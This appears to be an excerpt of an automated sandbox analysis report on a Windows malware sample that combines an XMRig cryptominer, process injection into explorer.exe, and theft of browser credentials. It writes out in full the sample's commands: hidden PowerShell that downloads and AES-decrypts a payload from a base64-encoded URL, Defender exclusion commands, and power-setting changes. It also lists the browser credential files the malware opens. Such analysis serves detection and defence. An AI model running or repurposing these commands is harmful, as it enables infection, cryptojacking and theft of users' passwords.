                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: 13_2_0030A1B0 GetCurrentProcess,_memset,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,_memmove,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,_memmove,NtMapViewOfSection,_memset,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,13_2_0030A1B0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe NtMapViewOfSection: Indirect: 0x1677ADB8CB4
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe NtMapViewOfSection: Indirect: 0x1677ADB8777
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe NtMapViewOfSection: Indirect: 0x16DE6BC8777
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe NtMapViewOfSection: Indirect: 0x16DE6BC8CB4
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe NtUnmapViewOfSection: Indirect: 0x1677ADB8C48
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe NtUnmapViewOfSection: Indirect: 0x16DE6BC8C48
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Memory written: PID: 1436 base: 140000000 value: 4D
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Memory written: PID: 1436 base: 140001000 value: NU
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Memory written: PID: 1436 base: 140665000 value: DF
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Memory written: PID: 1436 base: 140834000 value: 00
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Memory written: PID: 1436 base: 11AF010 value: 00
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                    Source: C:\Windows\explorer.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                    Source: C:\Windows\explorer.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
                    Source: C:\Windows\explorer.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Thread register set: target process: 1436
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: 13_2_00304410 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,13_2_00304410
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: 13_2_003044E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,13_2_003044E0
                    Source: C:\Windows\explorer.exe Code function: 16_2_00E042E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,16_2_00E042E0
                    Source: C:\Windows\explorer.exe Code function: 16_2_00E043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,16_2_00E043D0
                    Source: C:\Windows\explorer.exe Code function: 16_2_00E0A3B0 setsockopt,SetEvent,LocalAlloc,wnsprintfW,LocalAlloc,lstrcpyW,LocalAlloc,lstrcpyW,CoInitializeEx,ShellExecuteExW,GetLastError,CoUninitialize,LocalAlloc,wnsprintfW,CreateProcessW,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,shutdown,closesocket,16_2_00E0A3B0
                    Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net session
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\downloaded_file.exe "C:\Users\user\AppData\Local\Temp\downloaded_file.exe"
                    Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Process created: C:\Windows\explorer.exe explorer.exe
                    Source: C:\Windows\System32\cmd.exe Process created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "invoke-webrequest -uri ([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('ahr0chm6ly93b28wotc4nzg3odeud2lul2rvd25sb2fkzwrfzmlszs5iaw4='))) -outfile 'c:\users\user\appdata\local\temp\downloaded_file.bin'"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "$key = [system.text.encoding]::utf8.getbytes('blmgb+wrfprxmfxk7ymkpm3svhuaypt9');" "$iv = [system.text.encoding]::utf8.getbytes('5t9nsupo0ca/tujh');" "$aes = [system.security.cryptography.aes]::create();" "$aes.key = $key; $aes.iv = $iv;" "$decryptor = $aes.createdecryptor();" "$inputfile = 'c:\users\user\appdata\local\temp\downloaded_file.bin';" "$encryptedbytes = [system.io.file]::readallbytes($inputfile);" "$decryptedbytes = $decryptor.transformfinalblock($encryptedbytes, 0, $encryptedbytes.length);" "$outputfile = 'c:\users\user\appdata\local\temp\downloaded_file.exe';" "[system.io.file]::writeallbytes($outputfile, $decryptedbytes);"
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: 13_2_00310400 AllocateAndInitializeSid,_memset,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,LocalFree,13_2_00310400
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: 13_2_0031C3A0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,13_2_0031C3A0
                    Source: explorer.exe, 0000001C.00000003.2506090498.0000000001429000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: me":ername":"user","gpu":"5288N63ZM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activeow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2933340637.000000000142C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2061842707.000000000143A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzC:\Windows\explorer.exe - Program Manager
                    Source: explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: foqmofc","computername":"642294","username":"user","gpu":"5288N63ZM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}H22
                    Source: explorer.exe, 0000001C.00000003.2506090498.0000000001429000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}
                    Source: explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2061842707.000000000143A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2934227088.0000000003950000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\explorer.exe - Program Manager
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {"id":"yeerysyjbfoqmofc","computername":"642294","username":"user","gpu":"5288N63ZM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":61,"type":"xmrig","pool":"pool.hashvault.pro","port":3333,"algo":"rx/0","worker":"","password":"","user":"46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB","hashrate":0.0,"status":2}
                    Source: explorer.exe, 0000001C.00000002.2934227088.0000000003950000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzC:\Windows\explorer.exe - Program Managerpool.hashvault.pro46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {"id":"yeerysyjbfoqmofc","computername":"642294","username":"user","gpu":"5288N63ZM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":61,"type":"xmrig","pool":"pool.hashvault.pro","port":3333,"algo":"rx/0","worker":"","password":"","user":"46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB","hashrate":0.0,"status":2}]
                    Source: explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2061842707.000000000143A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2504693994.0000000001430000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {"id":"yeerysyjbfoqmofc","computername":"642294","username":"user","gpu":"5288N63ZM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}
                    Source: explorer.exe, 0000001C.00000003.2505054410.0000000001434000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2506090498.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: foqmofc","computername":"642294","username":"user","gpu":"5288N63ZM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: OpenEventW,OpenMutexW,OpenMutexW,WaitForSingleObject,CreateEventW,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,WaitForSingleObject,WaitForSingleObject,setsockopt,CreateEventW,LocalAlloc,CreateThread,GetTickCount,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,___crtGetLocaleInfoEx,WSAGetLastError,GetTickCount,GetTickCount,___crtGetLocaleInfoEx,Sleep,shutdown,closesocket,SetEvent,WaitForSingleObject,CloseHandle,LocalFree,CloseHandle,shutdown,closesocket,CloseHandle,ExitProcess,WaitForSingleObject,WaitForSingleObject,SetEvent,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,ReleaseMutex,CloseHandle,CloseHandle,CloseHandle,13_2_00321030
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: setsockopt,___crtGetLocaleInfoEx,closesocket,13_2_003170F2
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: setsockopt,___crtGetLocaleInfoEx,closesocket,13_2_003170D9
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: ___crtGetLocaleInfoEx,WSACreateEvent,WaitForSingleObject,___crtGetLocaleInfoEx,WaitForSingleObject,WSAGetLastError,WSAEventSelect,WSAWaitForMultipleEvents,WaitForSingleObject,WSAEnumNetworkEvents,CloseHandle,13_2_00320950
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: LocalAlloc,und_memcpy,CreateEventW,wsprintfW,GetForegroundWindow,SetWindowTextW,WSAEventSelect,WSAWaitForMultipleEvents,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,LocalFree,CloseHandle,LocalFree,CloseHandle,CloseHandle,LocalFree,13_2_0031F9E0
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: LocalAlloc,und_memcpy,CreateEventW,WSAEventSelect,WSAWaitForMultipleEvents,LocalFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,WSAGetLastError,LocalFree,CloseHandle,CloseHandle,LocalFree,13_2_0031FC10
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: LocalAlloc,htons,___crtGetLocaleInfoEx,___crtGetLocaleInfoEx,und_memcpy,LocalFree,LocalFree,13_2_003204F0
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: ___crtGetLocaleInfoEx,WSACreateEvent,WaitForSingleObject,___crtGetLocaleInfoEx,WaitForSingleObject,WSAGetLastError,WSAEventSelect,WSAWaitForMultipleEvents,WaitForSingleObject,WSAEnumNetworkEvents,CloseHandle,13_2_00320CD0
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,setsockopt,___crtGetLocaleInfoEx,closesocket,setsockopt,___crtGetLocaleInfoEx,closesocket,CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,___crtGetLocaleInfoEx,closesocket,13_2_00316D30
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: LocalAlloc,htons,wsprintfA,___crtGetLocaleInfoEx,___crtGetLocaleInfoEx,und_memcpy,LocalFree,LocalFree,13_2_00320630
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: LocalAlloc,und_memcpy,CreateEventW,WSAEventSelect,WSAWaitForMultipleEvents,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,WSAGetLastError,LocalFree,CloseHandle,CloseHandle,LocalFree,13_2_0031FE10
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: ___crtGetLocaleInfoEx,13_2_0031F690
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: ___crtGetLocaleInfoEx,13_2_0031F730
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: LocalAlloc,und_memcpy,CreateEventW,WSAEventSelect,WSAWaitForMultipleEvents,LocalFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,LocalFree,CloseHandle,LocalFree,CloseHandle,CloseHandle,LocalFree,13_2_0031F7D0
                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_003141E0 __snwprintf,RegCreateKeyExW,RegCloseKey,_memset,GetSystemTime,SystemTimeToFileTime,13_2_003141E0
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_00322530 LocalAlloc,LoadLibraryW,LocalFree,GetProcAddress,LocalFree,_memset,LocalFree,GetUserGeoID,gethostname,gethostbyname,GetComputerNameExW,GetUserNameW,GetTickCount64,LocalFree,13_2_00322530
                    Source: C:\Windows\explorer.exeCode function: 18_2_0238A674 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,18_2_0238A674
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0031C090 GetModuleHandleA,GetProcAddress,RtlGetVersion,13_2_0031C090
                    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procexp.exe

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 13.2.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.powershell.exe.29e75ee9280.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.downloaded_file.exe.fedfd8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 16.2.explorer.exe.e00000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.powershell.exe.29e75e6b438.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.powershell.exe.29e75e6b438.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.0.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.powershell.exe.29e75ee9280.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000C.00000002.1939596081.0000029E75EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000003.1947121395.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000000.1946141643.0000000000332000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.1957167452.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.1939596081.0000029E75DED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7644, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: downloaded_file.exe PID: 7724, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: explorer.exe PID: 7784, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPED
                    Source: C:\Windows\explorer.exe | Code function: ENCWCHAR \Google\Chrome\User Data\Default\Login Data 18_2_022C40D0
                    Source: C:\Windows\explorer.exe | Code function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword 18_2_022CAF00
                    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data
                    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
                    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\pkcs11.txt
                    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\pkcs11.txt

                    Remote Access Functionality

                    Source: Yara match | File source: 13.2.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.powershell.exe.29e75ee9280.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.downloaded_file.exe.fedfd8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 16.2.explorer.exe.e00000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.powershell.exe.29e75e6b438.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.powershell.exe.29e75e6b438.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.0.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.powershell.exe.29e75ee9280.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000C.00000002.1939596081.0000029E75EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000003.1947121395.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000000.1946141643.0000000000332000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.1957167452.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
